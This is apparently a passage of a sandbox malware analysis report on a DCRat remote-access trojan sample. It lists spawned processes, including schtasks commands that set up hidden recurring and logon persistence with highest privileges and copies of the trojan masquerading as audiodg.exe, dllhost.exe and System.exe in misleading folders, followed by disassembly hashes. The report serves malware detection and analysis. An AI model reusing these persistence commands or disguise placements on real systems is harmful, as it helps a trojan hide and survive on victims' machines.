Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe"
Imagebase:	0xc30000
File size:	1'444'352 bytes
MD5 hash:	181D043C0617914801548F09D5B776D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000016.00000002.2172899315.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 12 /tr "'C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe'" /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektp" /sc ONLOGON /tr "'C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Program Files (x86)\Windows Defender\dllhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows defender\dllhost.exe"
Imagebase:	0xed0000
File size:	1'444'352 bytes
MD5 hash:	181D043C0617914801548F09D5B776D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000019.00000002.2159383737.0000000003231000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000019.00000002.2159383737.000000000326D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 6 /tr "'C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Program Files (x86)\Windows Defender\dllhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows defender\dllhost.exe"
Imagebase:	0xb00000
File size:	1'444'352 bytes
MD5 hash:	181D043C0617914801548F09D5B776D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001B.00000002.2177147830.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	22:02:00
Start date:	23/11/2024
Path:	C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"
Imagebase:	0x1d0000
File size:	1'444'352 bytes
MD5 hash:	181D043C0617914801548F09D5B776D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001C.00000002.2119361653.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	22:02:00
Start date:	23/11/2024
Path:	C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe
Imagebase:	0x2f0000
File size:	1'444'352 bytes
MD5 hash:	181D043C0617914801548F09D5B776D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.2179948488.0000000002781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	22:02:00
Start date:	23/11/2024
Path:	C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe
Imagebase:	0x860000
File size:	1'444'352 bytes
MD5 hash:	181D043C0617914801548F09D5B776D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.2180403115.0000000002BAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.2180403115.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	22:02:00
Start date:	23/11/2024
Path:	C:\Users\Public\Downloads\ShellExperienceHost.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\Downloads\ShellExperienceHost.exe
Imagebase:	0xb40000
File size:	1'444'352 bytes
MD5 hash:	181D043C0617914801548F09D5B776D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.2187202631.0000000002FCD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.2187202631.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	22:02:00
Start date:	23/11/2024
Path:	C:\Users\Public\Downloads\ShellExperienceHost.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\Downloads\ShellExperienceHost.exe
Imagebase:	0x9d0000
File size:	1'444'352 bytes
MD5 hash:	181D043C0617914801548F09D5B776D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.2187145311.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.2187145311.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	22:02:00
Start date:	23/11/2024
Path:	C:\Recovery\System.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\System.exe
Imagebase:	0x4b0000
File size:	1'444'352 bytes
MD5 hash:	181D043C0617914801548F09D5B776D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2186040475.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	22:02:01
Start date:	23/11/2024
Path:	C:\Recovery\System.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\System.exe
Imagebase:	0xa50000
File size:	1'444'352 bytes
MD5 hash:	181D043C0617914801548F09D5B776D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.2185482678.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	22:02:02
Start date:	23/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs"
Imagebase:	0x7ff7ee4f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	22:02:02
Start date:	23/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\28bf72c6-5a6e-449b-a0d6-76cd4ab5c11d.vbs"
Imagebase:	0x7ff7ee4f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	22:02:08
Start date:	23/11/2024
Path:	C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"
Imagebase:	0x90000
File size:	1'444'352 bytes
MD5 hash:	181D043C0617914801548F09D5B776D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000025.00000002.2234188359.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	22:02:10
Start date:	23/11/2024
Path:	C:\Recovery\System.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\System.exe"
Imagebase:	0xab0000
File size:	1'444'352 bytes
MD5 hash:	181D043C0617914801548F09D5B776D4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.2256735845.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Function 00007FF848F33565 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ada1335453600955019c70e2c02a06a92e40463538cfadad272f2b039ace2db4
Instruction ID: 0ea01f4f1b37abe5e6c25666c8d8fec40201be8cb543eb92e639aad63e8196c9
Opcode Fuzzy Hash: ada1335453600955019c70e2c02a06a92e40463538cfadad272f2b039ace2db4
Instruction Fuzzy Hash: B691AF31E1C94A8FE788EB6CD8197B9BBE1FF9A350F90017AC009D32C6DF6928058755

Function 00007FF848F30A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F30A70

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: 9e1106f9ad43f77d2d1a4765e0c2d4efde7b54284c1c5af896a84e3cf87cd227
Instruction ID: 418b6c979eb6539334a61bef35e6a65cc13577c6270de93419598331a2739870
Opcode Fuzzy Hash: 9e1106f9ad43f77d2d1a4765e0c2d4efde7b54284c1c5af896a84e3cf87cd227
Instruction Fuzzy Hash: 4E116A31D0994E9FEB84FB68D8492BD7BE0FF98390F4005B7D809C6192EF38A5448700

Function 00007FF848F3123D Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F312AD

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: a96ddc63d2fb94f22fc41f3360f1d7279796e2e0bffe8418a4b66ec3aa6addde
Instruction ID: 290acf658cca8dc0c66c830248308d34956d0ba9864ef840f0e50c5ff9e06227
Opcode Fuzzy Hash: a96ddc63d2fb94f22fc41f3360f1d7279796e2e0bffe8418a4b66ec3aa6addde
Instruction Fuzzy Hash: 1811BF30D0D64E8EEB99FB6884592B97BE0FF5A341F0405BBE00AD60D2EF29A480C710

Function 00007FF848F31250 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F312AD

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 9d77a371624e10987eb50789188452511df43a60edb5fd8c61f44d310b69c56a
Instruction ID: 3a47028c1ba5373cc14021c02d64e15605f368ab4087a8cda02422b6c7b2444a
Opcode Fuzzy Hash: 9d77a371624e10987eb50789188452511df43a60edb5fd8c61f44d310b69c56a
Instruction Fuzzy Hash: 3AF0AF30D1D65F8EEB98BB6898182BA77E4FF56355F04067BE40DE20D1EF2855948214

Function 00007FF848F305A0 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44196e642d37e5e21a4d02240d9dc00d21333f695cd7b9b9ce7a9fe7a5e00052
Instruction ID: 0b546b945578facbfb93ed83d645f71dba9e17b3725fd016ee186a56744c3d4a
Opcode Fuzzy Hash: 44196e642d37e5e21a4d02240d9dc00d21333f695cd7b9b9ce7a9fe7a5e00052
Instruction Fuzzy Hash: 61911723D0F5D68EE255B77C78161FA6BA0FF926A4F0C43F7D4888A0DBDE1C54068299

Function 00007FF848F30638 Relevance: .3, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c8aeeeaa1d0469f37d76708fd2032f5489e95d544d343c158e23d4938d0681c
Instruction ID: e64df5c30b9d05bc1e5d26d7605458583aefe9167817f468ab68896302ab109b
Opcode Fuzzy Hash: 3c8aeeeaa1d0469f37d76708fd2032f5489e95d544d343c158e23d4938d0681c
Instruction Fuzzy Hash: 2E81E623D0E5D68EE255B77C78161F97BA0FF927A4F0843F7D4888A0DBDE2C54068299

Function 00007FF848F30615 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a54502f59a2ed55e397ab05d22030b35b3ec3ea3789e046570ff9563dbc5d2eb
Instruction ID: 7c21c9f4d9e739dd6afd1be03f233313507177f8ac6e8fcb86d3fb2c81f036da
Opcode Fuzzy Hash: a54502f59a2ed55e397ab05d22030b35b3ec3ea3789e046570ff9563dbc5d2eb
Instruction Fuzzy Hash: 46810823D0F5D68EE255B77C78161F96F90FF926A4F0C42F7D4888A0DBDE1C54068299

Function 00007FF848F305ED Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 223a9a61b2983b1f8967c20d6b32b22671e7096dc5482ebf02489cf290881198
Instruction ID: 2d8fa828dbada210dc563190a8fe481cdb0565fec256f0b6b358635202cd1de9
Opcode Fuzzy Hash: 223a9a61b2983b1f8967c20d6b32b22671e7096dc5482ebf02489cf290881198
Instruction Fuzzy Hash: 4F812723D0F6D68FE215777C78161F97BA0FF926A4F0C42B7D4888A0D7DE1C540A8299

Function 00007FF848F316D8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89f974c313def7ecacb4fcf2a0fd0a0310764a02ea5b76bee2b33862511e9927
Instruction ID: 7895fe8b23ee93c959a6ea43536cfb7efe1f00c63bd884dfc9e25d3bc6cf9ce1
Opcode Fuzzy Hash: 89f974c313def7ecacb4fcf2a0fd0a0310764a02ea5b76bee2b33862511e9927
Instruction Fuzzy Hash: A281AD31A0CA4A8FDB58EB2888555B977E2FF99740F1445BAE44DC32C6CF24AC42C785

Function 00007FF848F30640 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85a00e05cfc10e4e8764e45685b9ea1910295cc4da6026d750345e10c649f7c1
Instruction ID: 6a609fc65032d368bdde3cc1889ca0fcf92c99d7003d081c64de0601675e9f9c
Opcode Fuzzy Hash: 85a00e05cfc10e4e8764e45685b9ea1910295cc4da6026d750345e10c649f7c1
Instruction Fuzzy Hash: 8271E723D0F6D68EE255777C78161F96BA0FF926A4F0C42F7D4888A0DBDE1C54068299

Function 00007FF848F3B1F2 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8689a8a9035d0cb1bdc04f878a9b501854434f91a2e34b7ff98fb58415e5d9
Instruction ID: 208902aba19ee4c4485eda431c43e6c4a4107f1380db16e0c2a2543033e5613d
Opcode Fuzzy Hash: 0a8689a8a9035d0cb1bdc04f878a9b501854434f91a2e34b7ff98fb58415e5d9
Instruction Fuzzy Hash: CD613570E0C61E8FEB94EBA884546FDB7B1EF59340F50017AD40DE7282EF3869518B58

Function 00007FF848F31D2D Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fc777972c882e2696a0287c527cdf2b300247680369b327a0abdaffde273b66
Instruction ID: 14c886f3350b4ae35af8e05114b7bc38b424109ab6ee97ea53d80bf52ea5ff3c
Opcode Fuzzy Hash: 6fc777972c882e2696a0287c527cdf2b300247680369b327a0abdaffde273b66
Instruction Fuzzy Hash: A351B131A0CA9A8FDB48EF1888545BA77E2FB98340F14457EE44AC7295CF34E842C785

Function 00007FF848F33165 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eca7ccb7677c827eef98b94637a831e901b6492680730e11e4e246edac465102
Instruction ID: 9418ce3dfdaa6c236712be21c96546e31ed60c32a954012382f18ad331d966dd
Opcode Fuzzy Hash: eca7ccb7677c827eef98b94637a831e901b6492680730e11e4e246edac465102
Instruction Fuzzy Hash: 43510270D0860E8FEB54EB98E4596EDBBB1FF58341F40417AD00AE72D2DB38A9458B58

Function 00007FF848F32145 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 439f10cedf0b3d1565d54880090ace916afc859fda887ca0e0fcddd0216edcdd
Instruction ID: 2270fa0db0dacc886150ea519f4b9bf93f58a6a13d0869e87cebde8b07772ec7
Opcode Fuzzy Hash: 439f10cedf0b3d1565d54880090ace916afc859fda887ca0e0fcddd0216edcdd
Instruction Fuzzy Hash: E8413531E1DA8A4FE346FB7898491B8BBE0EF4A391F0501BBD44DC71D2DF28A8418365

Function 00007FF848F3B33D Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55653e23dda2f9b6ac493a7555717816adcb00f169f090de92433546477379a8
Instruction ID: d11e43fb955c3f65bc985355090a64dca91da87e8cb0abe501304c1356438e91
Opcode Fuzzy Hash: 55653e23dda2f9b6ac493a7555717816adcb00f169f090de92433546477379a8
Instruction Fuzzy Hash: 2E41FD71E2C94A9EE742FB6898692F97BE0FF5A351F0404B7C40CC60D2EF38A4408358

Function 00007FF848F30805 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cd99bf60dd5dcddfaddb7f3016715e07e101f1d311586b0b32aecb8c9b3a145
Instruction ID: ae0410b5d92b7848b5ed78cf993255e716355288a64f90b217594aef2e5edabf
Opcode Fuzzy Hash: 6cd99bf60dd5dcddfaddb7f3016715e07e101f1d311586b0b32aecb8c9b3a145
Instruction Fuzzy Hash: 03212672D1EA869FE344777CA85A1EA7BD0FF91399F080177D448C90C3EE08A156C2D5

Function 00007FF848F33294 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56f55c4990ffa919bd9138bfbcb0acd21bdf0cd4da56b0c26cb7d85bcb7c22e3
Instruction ID: b1a983c4fbf6bf7d9f9a69b647c8c3b212e8b2604d59ed8f869043f1fd75a132
Opcode Fuzzy Hash: 56f55c4990ffa919bd9138bfbcb0acd21bdf0cd4da56b0c26cb7d85bcb7c22e3
Instruction Fuzzy Hash: 4821D270D0891D8FEB94EB98D494AECBBF1FB98351F50407AD00AE72D1DB38A944CB54

Function 00007FF848F3A9B1 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fffc18eba68743c1b4595d6d063b713bacb2213a5124c7bb550156c34a8b1676
Instruction ID: c2386db6b8ccb2a7252f71953ae28995a9a6cd95d32b05152c2453531b51583f
Opcode Fuzzy Hash: fffc18eba68743c1b4595d6d063b713bacb2213a5124c7bb550156c34a8b1676
Instruction Fuzzy Hash: 1D215E71918A4DCFDF89EF18C459AAD7BF0FF68345F0505AAE809D7291DB34A990CB80

Function 00007FF848F33354 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ad6affea844db75dff42b581b5e4d08742890fbe0f0fc560010f91b224bf1ed
Instruction ID: 1c2a478552191b8d399be74bc345f1aa31a0f2afe6823e9c85903cb01db02a81
Opcode Fuzzy Hash: 7ad6affea844db75dff42b581b5e4d08742890fbe0f0fc560010f91b224bf1ed
Instruction Fuzzy Hash: A421D23084D78A8FE742EB7888585E97FF0EF5B301F0945EBD048CB0A2DA29A54AC751

Function 00007FF848F334E1 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 903ba012b8a290fead7fc83304f027b02d75875f803a2e4b78d40f5bfda9c301
Instruction ID: de91a2d40e93a960e19edb0dab2ccf8637405d9de7e66fab420664564f4085d6
Opcode Fuzzy Hash: 903ba012b8a290fead7fc83304f027b02d75875f803a2e4b78d40f5bfda9c301
Instruction Fuzzy Hash: D611397090868E8FDB89EF68C8596BA7BA0FF18341F0409BAD41AC61D2DB35A540C704

Function 00007FF848F32E81 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a3e3a42dc7f7886c27187b9c5cf39ada6640222073c45333efeadbb18edaed
Instruction ID: 6d8741b30b8629431415e9631227b4984d740d2e4516512a62392ea26fdedb28
Opcode Fuzzy Hash: e4a3e3a42dc7f7886c27187b9c5cf39ada6640222073c45333efeadbb18edaed
Instruction Fuzzy Hash: F901783191D68E8FE751FBA8888A6A97BE0FF59342F0544B7D40CC71A2EB38E4848714

Function 00007FF848F3B075 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

